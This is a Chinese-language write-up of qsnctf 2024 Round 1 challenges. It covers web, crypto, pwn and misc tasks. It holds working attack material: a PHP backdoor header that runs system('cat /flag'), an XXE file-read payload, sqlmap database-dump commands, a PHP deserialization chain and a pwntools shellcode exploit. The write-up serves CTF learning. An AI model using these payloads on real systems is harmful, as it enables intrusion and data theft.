qsnctf-2024#Round1


WEB

EasyMD5

考查 MD5 碰撞(实际利用的是 PHP `==` 弱类型比较)

image-20240229194659778

随便上传文件,将其发送到 Repeater

image-20240229193959031

发现需要 PDF 的 MIME 类型

设置 Content-Type 为 application/pdf

image-20240229194119131

猜测题目意思为上传不同文件,但需要 `md5($a) == md5($b)`

根据

<?php
// Both digests start with "0e" followed only by digits, so PHP's loose ==
// treats them as numeric strings equal to zero. Compare digests with === or
// hash_equals() instead.
$first = md5('240610708');  // 0e462097431906509019562988736854
$second = md5('QNKCDZO');   // 0e830400451993494058024219903391
var_dump($first == $second); // bool(true)
?>

所以文件内容修改为 240610708QNKCDZO

image-20240229194526180

PHP的后门

image-20240229194751015

根据提示查看 服务器php版本

image-20240229194832339

搜索可知此版本有远程命令执行漏洞

修改 User-Agentt: zerodiumsystem("cat /flag");

image-20240229195032492

PHP的XXE

给了 phpinfo

image-20240229195407720

搜索可知 dom.php 可以触发XXE漏洞

随手拿个 PoC

<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE xxe[
<!ELEMENT test ANY >
<!ENTITY xxe SYSTEM "file:///flag" >]>
<test>
<name>&xxe;</name>
</test>

image-20240229195634852

Easy_SQLi

简单的布尔盲注,顺便试下 sqlmap

python sqlmap.py -u "http://challenge.qsnctf.com:30832/login.php" --data "uname=*&psw=*" --technique B --batch --risk 3 --threads=10 --dbs

image-20240301185843180

python sqlmap.py -u "http://challenge.qsnctf.com:30832/login.php" --data "uname=*&psw=*" --technique B --batch --risk 3 --threads=10 -D qsnctf --tables

image-20240301185923577

python sqlmap.py -u "http://challenge.qsnctf.com:30832/login.php" --data "uname=*&psw=*" --technique B --batch --risk 3 --threads=10 -D qsnctf -T users --columns

image-20240301190001650

python sqlmap.py -u "http://challenge.qsnctf.com:30832/login.php" --data "uname=*&psw=*" --technique B --batch --risk 3 --threads=10 -D qsnctf -T users -C password,username --dump

image-20240301190127496

雏形系统

php 反序列化

拿 dirsearch 扫了一下得到 /www.zip

image-20240301191342399

发现 PHP 源码被加密了

找个解密网站得到原始代码


<?php
// Turns off all error reporting; among other things this hides the
// undefined-index notices from the $_POST reads further down.
error_reporting(0);

class shi
{
    public $next;
    public $pass;

    // Runs whenever an instance is converted to a string (e.g. by echo).
    // Performs a static call PLZ() on whatever $next holds; when $next is a
    // Demo object that call lands in Demo::__callStatic(). No string is
    // returned, which PHP reports as an error after the call has run.
    public function __toString(){
        $this->next::PLZ($this->pass);
    }
}
class wo
{
    public $sex;
    public $age;
    public $intention;

    // Called automatically when the object is destroyed — including objects
    // built by unserialize() — so this is the first method reachable from
    // attacker-controlled data.
    public function __destruct(){
        echo "Hi Try serialize Me!";
        $this->inspect();
    }

    // Loose (==) string gate; on success $intention is echoed, which converts
    // it to a string and therefore calls its __toString() if it is an object.
    // The final echo runs unconditionally.
    function inspect(){
        if($this->sex=='boy'&&$this->age=='eighteen')
        {
            echo $this->intention;
        }
        echo "🙅18岁🈲";
    }
}

class Demo
{
    public $a;

    // Catches any undefined static call (e.g. Demo::PLZ(...)) and invokes the
    // global $b — set from $_POST['password'] below — as a callable with the
    // first argument. The request thus chooses which function gets called.
    static function __callStatic($action, $do)
    {
        global $b;
        $b($do[0]);
    }
}

$b = $_POST['password'];
$a = $_POST['username'];
// Sink: unserialize() on request data with no allowed_classes restriction, so
// any class above can be instantiated and its magic methods run. Mitigation:
// unserialize($a, ['allowed_classes' => false]) or a JSON payload format.
// The @ only silences warnings; it does not stop the object graph being built.
@unserialize($a);
if (!isset($b)) {
    echo "==================PLZ Input Your Name!==================";
}
// Loose comparison (==); credential checks should use ===.
if($a=='admin'&&$b=="'k1fuhu's test demo")
{
    echo("登录成功");
}

?>

思路很清晰

直接构造

$c = new wo;
$c->sex = "boy";
$c->age = "eighteen";
$Shit = new shi();
$damn = new Demo;
$damn->$b = "system";
$damn->$a = "system";
$Shit->next = $damn;
$Shit->pass = "cat /flag";
$c->intention = $Shit;
O:2:"wo":3:{s:3:"sex";s:3:"boy";s:3:"age";s:8:"eighteen";s:9:"intention";O:3:"shi":2:{s:4:"next";O:4:"Demo":2:{s:1:"a";N;s:0:"";s:6:"system";}s:4:"pass";s:9:"cat /flag";}}

image-20240301191546616

CRYPTO

解个方程

欢迎来到青少年CTF,领取你的题目,进行解答吧!这是一道数学题!!
p = 70559223834693127821574754764487916409
q = 291568698992769291833060922537869705687
e = 65537
d = ?

import gmpy2

# Challenge parameters: the two primes and the public exponent.
p = 70559223834693127821574754764487916409
q = 291568698992769291833060922537869705687
e = 65537

# The private exponent is the inverse of e modulo Euler's totient (p-1)(q-1).
phi = (p - 1) * (q - 1)
d = gmpy2.invert(e, phi)
print(f"dec: {d}")

ez_log

from Crypto.Util.number import *
from random import *

# Placeholder flag; the challenge keeps the real one.
flag = b'key{xxxxxxx}'
m = bytes_to_long(flag)
# Modulus and generator of the discrete-log instance c = g^m mod p.
p = 3006156660704242356836102321001016782090189571028526298055526061772989406357037170723984497344618257575827271367883545096587962708266010793826346841303043716776726799898939374985320242033037
g = 3
c = pow(g, m, p)
print('c=', c)

c=1409970374102613813154760568158003123875011225002977256272054381228289122265018484564640527366469489471011960208090567829620353663244080501413923713114331075726206212331906003182378049316620
from sympy import *
from Crypto.Util.number import *

# Public parameters taken from the challenge output.
p = 3006156660704242356836102321001016782090189571028526298055526061772989406357037170723984497344618257575827271367883545096587962708266010793826346841303043716776726799898939374985320242033037
g = 3
c = 1409970374102613813154760568158003123875011225002977256272054381228289122265018484564640527366469489471011960208090567829620353663244080501413923713114331075726206212331906003182378049316620

# sympy's discrete_log(n, a, b) returns x with b**x == a (mod n); that x is the
# message integer, which is then decoded back to bytes.
exponent = discrete_log(p, c, g)
print("m =", long_to_bytes(exponent))

image-20240229201301587

ezrsa

题干

from Crypto.Util.number import *

# Placeholder flag that gets encrypted.
flag = b'qsnctf{xxx-xxxx-xxxx-xxxx-xxxxxxxxx}'
m = bytes_to_long(flag)
# Three-prime RSA modulus; the product of the first two primes is leaked.
p, q, r = getPrime(512), getPrime(512), getPrime(512)
n = p * q * r
leak = p * q
e = 0x10001
c = pow(m, e, n)
for label, value in (("c", c), ("n", n), ("leak", leak)):
    print(f"{label} = {value}")
# c = 173595148273920891298949441727054328036798235134009407863895058729356993814829340513336567479145746034781201823694596731886346933549577879568197521436900228804336056005940048086898794965549472641334237175801757569154295743915744875800647234151498117718087319013271748204766997008772782882813572814296213516343420236873651060868227487925491016675461540894535563805130406391144077296854410932791530755245514034242725719196949258860635915202993968073392778882692892
# n = 1396260492498511956349135417172451037537784979103780135274615061278987700332528182553755818089525730969834188061440258058608031560916760566772742776224528590152873339613356858551518007022519033843622680128062108378429621960808412913676262141139805667510615660359775475558729686515755127570976326233255349428771437052206564497930971797497510539724340471032433502724390526210100979700467607197448780324427953582222885828678441579349835574787605145514115368144031247
# leak = 152254254502019783796170793516692965417859793325424454902983763285830332059600151137162944897787532369961875766745853731769162511788354655291037150251085942093411304833287510644995339391240164033052417935316876168953838783742499485868268986832640692657031861629721225482114382472324320636566226653243762620647
from sage.all import *
from Crypto.Util.number import *

# n, leak and c are the three challenge outputs. The leaked p*q gives the third
# prime directly; decrypting modulo r alone recovers m only if m < r, which
# presumably holds for the short flag — confirm if the output looks wrong.
third_prime = n // leak
priv_exp = inverse_mod(65537, third_prime - 1)
plain = pow(c, priv_exp, third_prime)
print(long_to_bytes(plain))

factor1

import gmpy2
import hashlib
from Crypto.Util.number import *

# Two 512-bit primes and a small (256-bit) private exponent; e is its inverse
# modulo (p^2 - 1)(q^2 - 1) rather than the usual totient.
p, q = getPrime(512), getPrime(512)
d = getPrime(256)
group_order = (p**2 - 1) * (q**2 - 1)
e = gmpy2.invert(d, group_order)
# The flag is the md5 hex digest of the decimal string of p + q.
digest = hashlib.md5(str(p + q).encode()).hexdigest()
flag = "qsnctf{%s}" % digest
print(e)
print(p * q)
# 4602579741478096718172697218991734057017874575484294836043557658035277770732473025335441717904100009903832353915404911860888652406859201203199117870443451616457858224082143505393843596092945634675849883286107358454466242110831071552006337406116884147391687266536283395576632885877802269157970812862013700574069981471342712011889330292259696760297157958521276388120468220050600419562910879539594831789625596079773163447643235584124521162320450208920533174722239029506505492660271016917768383199286913178821124229554263149007237679675898370759082438533535303763664408320263258144488534391712835778283152436277295861859
# 78665180675705390001452176028555030916759695827388719494705803822699938653475348982551790040292552032924503104351703419136483078949363470430486531014134503794074329285351511023863461560882297331218446027873891885693166833003633460113924956936552466354566559741886902240131031116897293107970411780310764816053

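from sage.all import *
import hashlib
from Crypto.Util.number import *

# Small-d recovery for e*d = 1 (mod (p^2-1)(q^2-1)): LLL on a 2x2 lattice
# yields d, from which k and then p^2+q^2 follow; (p+q)^2 = p^2+q^2+2n gives p+q.
# e and n are the two challenge outputs (defined elsewhere).
# Exponentiation is written with ** on purpose: `^` is only a power operator
# under the Sage preparser (sage REPL / .sage file) and is bitwise XOR when the
# script is run as plain Python.
A = matrix(ZZ, 2)
A[0, 0] = 2**1024
A[0, 1] = e
A[1, 1] = n**2
reduced = A.LLL()
print(reduced[0])
# LLL may return the short vector with either sign; d itself is positive.
x = abs(reduced[0, 0])
d = x // (2**1024)
# e*d - 1 = k*(n^2 - (p^2+q^2) + 1), so floor((e*d-1)/n^2) is k - 1.
k = (e * d - 1) // (n**2) + 1
p2q2 = 1 + n**2 - (e * d - 1) // k
pq = isqrt(p2q2 + 2 * n)
flag = "qsnctf{" + hashlib.md5(str(pq).encode()).hexdigest() + "}"
# The original computed the flag but never displayed it.
print(flag)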

四重加密

image-20240301190709763

base32

OFZW4Y3UMY======
qsnctf

得到

&#122;&#99;&#121;&#101;&#123;&#109;&#120;&#109;&#101;&#109;&#116;&#120;&#114;&#122;&#116;&#95;&#108;&#122;&#98;&#104;&#97;&#95;&#107;&#119;&#109;&#113;&#122;&#101;&#99;&#125;&#124;&#107;&#101;&#121;&#61;&#104;&#101;&#108;&#108;&#111;

HTML 实体解码

image-20240301190915127

根据前四个字母 flag 判断

image-20240301191157026

PWN

简单的数学题

nc上去算三道数学题就行

Easy_Shellcode

from pwn import *
import re

#context.log_level = "debug"
context.arch = 'amd64'

p = remote("challenge.qsnctf.com", 31977)#process("./easy-shellcode")

buf_addr = p.recvuntil("\n")[:-1]
print(buf_addr)
shellcode_addr = int(buf_addr,16) + 32


shellcode = asm(shellcraft.sh())

payload = shellcode + b'a' * (0x100 + 0x8 - len(shellcode)) + p64(int(buf_addr,16))
#p.recv()
p.sendline(payload)
p.interactive()

RE

来打CS咯

在线网站微步在线云沙箱 (threatbook.com)

分析网络行为即可

image-20240229202238639

MISC

CTFer Revenge

题目太长贴个图片吧

image-20240229202503571

经常使用 hex editor 的应该很熟悉

根据提示 从反方向开始移动, 回到当初爱你的时空

从尾巴开始看

image-20240229202608307

可以发现熟悉的PK文件头

可知为 zip文件

写脚本把顺序反转一下就行

def reverse_string(string):
    """Return *string* with its characters in reverse order."""
    return "".join(reversed(string))


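def reverse_lines(input_file, output_file):
    """Rebuild a reversed dump: read *input_file* and emit its lines last-to-first.

    For each line, the text from the first to the last ``|`` (delimiters
    included) is cut out, the remainder is reversed character-wise, and its
    first 9 characters are dropped before it is written to *output_file*
    followed by a newline. The original docstring described the steps in the
    wrong order; this one matches what the code does.

    Args:
        input_file: path of the text file to read.
        output_file: path of the file to (over)write.
    """
    with open(input_file, "r") as fin, open(output_file, "w") as fout:
        for line in reversed(fin.readlines()):
            start_index = line.find("|")
            # rfind() is -1 exactly when find() is, so a single check suffices;
            # with one '|' both indices coincide and only that character goes.
            if start_index != -1:
                end_index = line.rfind("|")
                # Only the tail is stripped, as before; the head keeps its spacing.
                kept = line[:start_index] + line[end_index + 1 :].strip()
            else:
                kept = line.strip()
            # Mirror the remaining text and discard its first 9 characters.
            fout.write(kept[::-1][9:] + "\n")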


if __name__ == "__main__":
    # Source dump and destination for the rebuilt lines.
    src_path, dst_path = "a.txt", "c.txt"
    reverse_lines(src_path, dst_path)
    print("Lines reversed and written to", dst_path)

调整下手动写入变成 zip 文件

有密码加密

image-20240229202937794

根据提示

使用 ARCHPR 爆破

image-20240229203131201

多情

图片 foremost 出新图片

存在 CRC 错误,找个脚本爆破出正确的宽高后修改

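import zlib
import struct


def find_ihdr_dimensions(ihdr, target_crc, limit=4096):
    """Brute-force the width/height of a PNG IHDR chunk against its stored CRC.

    ``ihdr`` is the chunk as laid out in the file: 4-byte type ("IHDR"),
    4-byte width, 4-byte height, then the 5 remaining data bytes (bit depth,
    colour type, compression, filter, interlace). Every (width, height) pair
    in ``range(limit)`` is written into the two fields and the CRC-32 of the
    result is compared with ``target_crc``.

    Args:
        ihdr: bytes/bytearray holding the chunk type plus its 13 data bytes.
        target_crc: the CRC-32 value stored after the chunk data in the file.
        limit: exclusive upper bound tried for both dimensions.

    Returns:
        ``(width, height)`` of the first match, or ``None`` when no pair below
        ``limit`` reproduces the CRC.
    """
    chunk_type = bytes(ihdr[:4])
    tail = bytes(ihdr[12:])
    for w in range(limit):
        # CRC-32 is a running checksum: hash the prefix once per width and
        # only fold height + tail inside the inner loop.
        prefix_crc = zlib.crc32(chunk_type + struct.pack(">i", w))
        for h in range(limit):
            if zlib.crc32(struct.pack(">i", h) + tail, prefix_crc) == target_crc:
                return w, h
    return None


if __name__ == "__main__":
    with open(r"./00000013.png", "rb") as image_data:
        bin_data = image_data.read()
    # Bytes 12..28: the IHDR chunk type and its 13 data bytes (after the 8-byte
    # PNG signature and the 4-byte chunk length).
    data = bytearray(bin_data[12:29])
    # CRC-32 stored in the file for the IHDR chunk.
    crc32key = 0x51F95FB8
    # In theory each field goes up to 0xffffffff, but for a real screen 0x0fff
    # is plenty.
    n = 4096
    found = find_ihdr_dimensions(data, crc32key, n)
    if found is None:
        print("no width/height below %d matches the stored CRC" % n)
    else:
        w, h = found
        print(
            "width:%s height:%s"
            % (struct.pack(">i", w).hex(), struct.pack(">i", h).hex())
        )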

00000013

得到提示

根据 zip 中的 0、1 猜测为二进制

1111100100 // 996

第二个零bn

第二个一p5

第六个一f6H

第三个零QS

第三个一mJ

第四个零Nh

第四个一cd

第五个一Eb

第一个零bv2

第一个一Lr

Lrp5mJcdEbbv2bnf6HQSNh

出了半天,但是没想到这就是flag了

小光的答案之书

首先

后来搜索到

image-20240301185136327

得到密码为:life

40dd801b5622186fdbb2f42d32cbf770

关注即可

ez_model

import torch
import torch.nn as nn


# 重新定义模型类
class MyModel(nn.Module):
def __init__(self):
super(MyModel, self).__init__()
# 卷积层
self.conv1 = nn.Conv2d(
in_channels=3, out_channels=16, kernel_size=3, stride=1, padding=1
)
self.conv2 = nn.Conv2d(
in_channels=16, out_channels=32, kernel_size=3, stride=1, padding=1
)
# 全连接层
self.fc = nn.Linear(32 * 32 * 32, 10) # 假设输入尺寸是32x32,输出类别数为10
# 添加额外的键
self.flag = nn.Parameter(torch.zeros(54)) # 假设flag是一个标量张量
self.hint = nn.Parameter(torch.zeros(64)) # 假设hint是一个标量张量

def forward(self, x):
x = torch.relu(self.conv1(x))
x = torch.relu(self.conv2(x))
x = x.view(x.size(0), -1) # 将张量展平成一维向量
x = self.fc(x)
return x


# 创建新的模型实例
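# Fresh instance whose parameter names and shapes mirror the checkpoint.
model = MyModel()

# Path of the challenge's .pth file — replace with your own.
path = "easy.pth"
# torch.load() unpickles by default, so a crafted .pth can run code when it is
# loaded; weights_only=True limits the loader to tensors and plain containers,
# which is all a state_dict needs.
checkpoint = torch.load(path, weights_only=True)

# Copy the checkpoint's parameters into the model.
model.load_state_dict(checkpoint)

print(checkpoint["hint"])

print(checkpoint["flag"])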

得到

image-20240301215630685

转成 ASCII 得

hint: ZzYyXxAaBbCcDdEeFfGgHhIiJjKkLlMmNnOoPpQqRrSsTtUuVvWw0123456789+/
flag: LidUJ3fQM2FVJoxpDwLvDyF3DwpPdwxOEgbQJoxnEgdnJgnojoZ5mF

使用 CyberChef

image-20240301215818418

